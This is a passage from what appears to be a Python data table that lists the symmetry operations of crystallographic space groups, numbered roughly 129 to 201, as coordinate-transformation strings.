'-y,-x,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z', 'x,-y+1/2,z', '-x+1/2,y,z',
'-y+1/2,-x+1/2,z', 'y,x,z'],
130: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x,y+1/2,-z+1/2', 'x+1/2,-y,-z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y,-x,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z',
'x,-y+1/2,z+1/2', '-x+1/2,y,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y,x,z+1/2'],
131: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,y,-z', 'x,-y,-z', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2', 'x,-y,z', '-x,y,z', '-y,-x,z+1/2', 'y,x,z+1/2'],
132: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,y,-z+1/2', 'x,-y,-z+1/2', 'y,x,-z', '-y,-x,-z',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z', 'y,x,z'],
133: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x+1/2,y,-z', 'x,-y+1/2,-z',
'y,x,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x+1/2,-y,z', '-x,y+1/2,z', '-y,-x,z+1/2', 'y+1/2,x+1/2,z+1/2'],
134: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2',
'y,x,-z', '-y+1/2,-x+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-y,-x,z', 'y+1/2,x+1/2,z'],
135: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2',
'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
136: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'y,x,-z', '-y,-x,-z', '-x,-y,-z', 'x,y,-z', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-y,-x,z', 'y,x,z'],
137: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x,y+1/2,-z', 'x+1/2,-y,-z',
'y+1/2,x+1/2,-z+1/2', '-y,-x,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x,-y+1/2,z', '-x+1/2,y,z', '-y+1/2,-x+1/2,z+1/2', 'y,x,z+1/2'],
138: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y,-z+1/2',
'y+1/2,x+1/2,-z', '-y,-x,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x,-y+1/2,z+1/2', '-x+1/2,y,z+1/2', '-y+1/2,-x+1/2,z', 'y,x,z'],
139: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z', '-x,-y,-z', 'x,y,-z',
'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x+1/2,-y+1/2,-z+1/2', 'x+1/2,y+1/2,-z+1/2',
'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2',
'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
140: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z',
'-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z'],
141: ['x,y,z', '-x+1/2,-y,z+1/2', '-y+1/4,x+3/4,z+1/4', 'y+1/4,-x+1/4,z+3/4', '-x+1/2,y,-z+1/2', 'x,-y,-z',
'y+1/4,x+3/4,-z+1/4', '-y+1/4,-x+1/4,-z+3/4', '-x,-y,-z', 'x+1/2,y,-z+1/2', 'y+3/4,-x+1/4,-z+3/4',
'-y+3/4,x+3/4,-z+1/4', 'x+1/2,-y,z+1/2', '-x,y,z', '-y+3/4,-x+1/4,z+3/4', 'y+3/4,x+3/4,z+1/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-y+3/4,x+1/4,z+3/4', 'y+3/4,-x+3/4,z+1/4', '-x,y+1/2,-z',
'x+1/2,-y+1/2,-z+1/2', 'y+3/4,x+1/4,-z+3/4', '-y+3/4,-x+3/4,-z+1/4', '-x+1/2,-y+1/2,-z+1/2',
'x,y+1/2,-z', 'y+1/4,-x+3/4,-z+1/4', '-y+1/4,x+1/4,-z+3/4', 'x,-y+1/2,z', '-x+1/2,y+1/2,z+1/2',
'-y+1/4,-x+3/4,z+1/4', 'y+1/4,x+1/4,z+3/4'],
142: ['x,y,z', '-x+1/2,-y,z+1/2', '-y+1/4,x+3/4,z+1/4', 'y+1/4,-x+1/4,z+3/4', '-x+1/2,y,-z', 'x,-y,-z+1/2',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', '-x,-y,-z', 'x+1/2,y,-z+1/2', 'y+3/4,-x+1/4,-z+3/4',
'-y+3/4,x+3/4,-z+1/4', 'x+1/2,-y,z', '-x,y,z+1/2', '-y+3/4,-x+1/4,z+1/4', 'y+3/4,x+3/4,z+3/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-y+3/4,x+1/4,z+3/4', 'y+3/4,-x+3/4,z+1/4', '-x,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z', 'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', '-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z',
'y+1/4,-x+3/4,-z+1/4', '-y+1/4,x+1/4,-z+3/4', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-y+1/4,-x+3/4,z+3/4',
'y+1/4,x+1/4,z+1/4'],
143: ['x,y,z', '-y,x-y,z', '-x+y,-x,z'],
144: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3'],
145: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3'],
146: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x+2/3,y+1/3,z+1/3', '-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3',
'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3'],
147: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z'],
148: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', '-x+2/3,-y+1/3,-z+1/3', 'y+2/3,-x+y+1/3,-z+1/3',
'x-y+2/3,x+1/3,-z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'-x+1/3,-y+2/3,-z+2/3', 'y+1/3,-x+y+2/3,-z+2/3', 'x-y+1/3,x+2/3,-z+2/3'],
149: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
150: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z'],
151: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-y,-x,-z+2/3', '-x+y,y,-z+1/3', 'x,x-y,-z'],
152: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', 'y,x,-z', 'x-y,-y,-z+2/3', '-x,-x+y,-z+1/3'],
153: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-y,-x,-z+1/3', '-x+y,y,-z+2/3', 'x,x-y,-z'],
154: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', 'y,x,-z', 'x-y,-y,-z+1/3', '-x,-x+y,-z+2/3'],
155: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', 'y+2/3,x+1/3,-z+1/3', 'x-y+2/3,-y+1/3,-z+1/3',
'-x+2/3,-x+y+1/3,-z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'y+1/3,x+2/3,-z+2/3', 'x-y+1/3,-y+2/3,-z+2/3', '-x+1/3,-x+y+2/3,-z+2/3'],
156: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z'],
157: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
158: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2'],
159: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
160: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', '-y+2/3,-x+1/3,z+1/3', '-x+y+2/3,y+1/3,z+1/3',
'x+2/3,x-y+1/3,z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'-y+1/3,-x+2/3,z+2/3', '-x+y+1/3,y+2/3,z+2/3', 'x+1/3,x-y+2/3,z+2/3'],
161: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', '-y+2/3,-x+1/3,z+5/6', '-x+y+2/3,y+1/3,z+5/6',
'x+2/3,x-y+1/3,z+5/6', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3',
'-y+1/3,-x+2/3,z+1/6', '-x+y+1/3,y+2/3,z+1/6', 'x+1/3,x-y+2/3,z+1/6'],
162: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
163: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2', '-x,-y,-z',
'y,-x+y,-z', 'x-y,x,-z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
164: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z'],
165: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z+1/2', 'x-y,-y,-z+1/2', '-x,-x+y,-z+1/2', '-x,-y,-z',
'y,-x+y,-z', 'x-y,x,-z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2'],
166: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'x+2/3,y+1/3,z+1/3', '-y+2/3,x-y+1/3,z+1/3',
'-x+y+2/3,-x+1/3,z+1/3', 'y+2/3,x+1/3,-z+1/3', 'x-y+2/3,-y+1/3,-z+1/3', '-x+2/3,-x+y+1/3,-z+1/3',
'-x+2/3,-y+1/3,-z+1/3', 'y+2/3,-x+y+1/3,-z+1/3', 'x-y+2/3,x+1/3,-z+1/3', '-y+2/3,-x+1/3,z+1/3',
'-x+y+2/3,y+1/3,z+1/3', 'x+2/3,x-y+1/3,z+1/3', 'x+1/3,y+2/3,z+2/3', '-y+1/3,x-y+2/3,z+2/3',
'-x+y+1/3,-x+2/3,z+2/3', 'y+1/3,x+2/3,-z+2/3', 'x-y+1/3,-y+2/3,-z+2/3', '-x+1/3,-x+y+2/3,-z+2/3',
'-x+1/3,-y+2/3,-z+2/3', 'y+1/3,-x+y+2/3,-z+2/3', 'x-y+1/3,x+2/3,-z+2/3', '-y+1/3,-x+2/3,z+2/3',
'-x+y+1/3,y+2/3,z+2/3', 'x+1/3,x-y+2/3,z+2/3'],
167: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'y,x,-z+1/2', 'x-y,-y,-z+1/2', '-x,-x+y,-z+1/2', '-x,-y,-z',
'y,-x+y,-z', 'x-y,x,-z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2', 'x+2/3,y+1/3,z+1/3',
'-y+2/3,x-y+1/3,z+1/3', '-x+y+2/3,-x+1/3,z+1/3', 'y+2/3,x+1/3,-z+5/6', 'x-y+2/3,-y+1/3,-z+5/6',
'-x+2/3,-x+y+1/3,-z+5/6', '-x+2/3,-y+1/3,-z+1/3', 'y+2/3,-x+y+1/3,-z+1/3', 'x-y+2/3,x+1/3,-z+1/3',
'-y+2/3,-x+1/3,z+5/6', '-x+y+2/3,y+1/3,z+5/6', 'x+2/3,x-y+1/3,z+5/6', 'x+1/3,y+2/3,z+2/3',
'-y+1/3,x-y+2/3,z+2/3', '-x+y+1/3,-x+2/3,z+2/3', 'y+1/3,x+2/3,-z+1/6', 'x-y+1/3,-y+2/3,-z+1/6',
'-x+1/3,-x+y+2/3,-z+1/6', '-x+1/3,-y+2/3,-z+2/3', 'y+1/3,-x+y+2/3,-z+2/3', 'x-y+1/3,x+2/3,-z+2/3',
'-y+1/3,-x+2/3,z+1/6', '-x+y+1/3,y+2/3,z+1/6', 'x+1/3,x-y+2/3,z+1/6'],
168: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z'],
169: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z+1/2', 'y,-x+y,z+5/6', 'x-y,x,z+1/6'],
170: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z+1/2', 'y,-x+y,z+1/6', 'x-y,x,z+5/6'],
171: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z', 'y,-x+y,z+2/3', 'x-y,x,z+1/3'],
172: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z', 'y,-x+y,z+1/3', 'x-y,x,z+2/3'],
173: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2'],
174: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z'],
175: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z',
'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z'],
176: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2'],
177: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z',
'-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
178: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z+1/2', 'y,-x+y,z+5/6', 'x-y,x,z+1/6', 'y,x,-z+1/3',
'x-y,-y,-z', '-x,-x+y,-z+2/3', '-y,-x,-z+5/6', '-x+y,y,-z+1/2', 'x,x-y,-z+1/6'],
179: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z+1/2', 'y,-x+y,z+1/6', 'x-y,x,z+5/6', 'y,x,-z+2/3',
'x-y,-y,-z', '-x,-x+y,-z+1/3', '-y,-x,-z+1/6', '-x+y,y,-z+1/2', 'x,x-y,-z+5/6'],
180: ['x,y,z', '-y,x-y,z+2/3', '-x+y,-x,z+1/3', '-x,-y,z', 'y,-x+y,z+2/3', 'x-y,x,z+1/3', 'y,x,-z+2/3',
'x-y,-y,-z', '-x,-x+y,-z+1/3', '-y,-x,-z+2/3', '-x+y,y,-z', 'x,x-y,-z+1/3'],
181: ['x,y,z', '-y,x-y,z+1/3', '-x+y,-x,z+2/3', '-x,-y,z', 'y,-x+y,z+1/3', 'x-y,x,z+2/3', 'y,x,-z+1/3',
'x-y,-y,-z', '-x,-x+y,-z+2/3', '-y,-x,-z+1/3', '-x+y,y,-z', 'x,x-y,-z+2/3'],
182: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2'],
183: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z',
'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
184: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', '-y,-x,z+1/2', '-x+y,y,z+1/2',
'x,x-y,z+1/2', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
185: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', '-y,-x,z+1/2',
'-x+y,y,z+1/2', 'x,x-y,z+1/2', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
186: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', '-y,-x,z', '-x+y,y,z',
'x,x-y,z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
187: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z',
'-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
188: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', '-y,-x,z+1/2',
'-x+y,y,z+1/2', 'x,x-y,z+1/2', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z'],
189: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
190: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', 'y,x,z+1/2', 'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
191: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', 'y,x,-z', 'x-y,-y,-z', '-x,-x+y,-z',
'-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z', 'x,y,-z', '-y,x-y,-z',
'-x+y,-x,-z', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
192: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z', 'y,-x+y,z', 'x-y,x,z', 'y,x,-z+1/2', 'x-y,-y,-z+1/2',
'-x,-x+y,-z+1/2', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z',
'x,y,-z', '-y,x-y,-z', '-x+y,-x,-z', '-y,-x,z+1/2', '-x+y,y,z+1/2', 'x,x-y,z+1/2', 'y,x,z+1/2',
'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
193: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', 'y,x,-z+1/2',
'x-y,-y,-z+1/2', '-x,-x+y,-z+1/2', '-y,-x,-z', '-x+y,y,-z', 'x,x-y,-z', '-x,-y,-z', 'y,-x+y,-z',
'x-y,x,-z', 'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', '-y,-x,z+1/2', '-x+y,y,z+1/2',
'x,x-y,z+1/2', 'y,x,z', 'x-y,-y,z', '-x,-x+y,z'],
194: ['x,y,z', '-y,x-y,z', '-x+y,-x,z', '-x,-y,z+1/2', 'y,-x+y,z+1/2', 'x-y,x,z+1/2', 'y,x,-z', 'x-y,-y,-z',
'-x,-x+y,-z', '-y,-x,-z+1/2', '-x+y,y,-z+1/2', 'x,x-y,-z+1/2', '-x,-y,-z', 'y,-x+y,-z', 'x-y,x,-z',
'x,y,-z+1/2', '-y,x-y,-z+1/2', '-x+y,-x,-z+1/2', '-y,-x,z', '-x+y,y,z', 'x,x-y,z', 'y,x,z+1/2',
'x-y,-y,z+1/2', '-x,-x+y,z+1/2'],
195: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x'],
196: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2',
'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2', 'y,z+1/2,x+1/2',
'-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2',
'-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2', 'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2',
'-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x'],
197: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2', '-z+1/2,-x+1/2,y+1/2',
'-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x+1/2',
'-y+1/2,-z+1/2,x+1/2'],
198: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2'],
199: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x'],
200: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y', 'z,-x,y',
'-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x'],
201: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y', '-z+1/2,x,-y+1/2', 'y,z,x', '-y+1/2,z,-x+1/2', 'y,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x',
'-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-z,-x,-y', '-z,x+1/2,y+1/2',
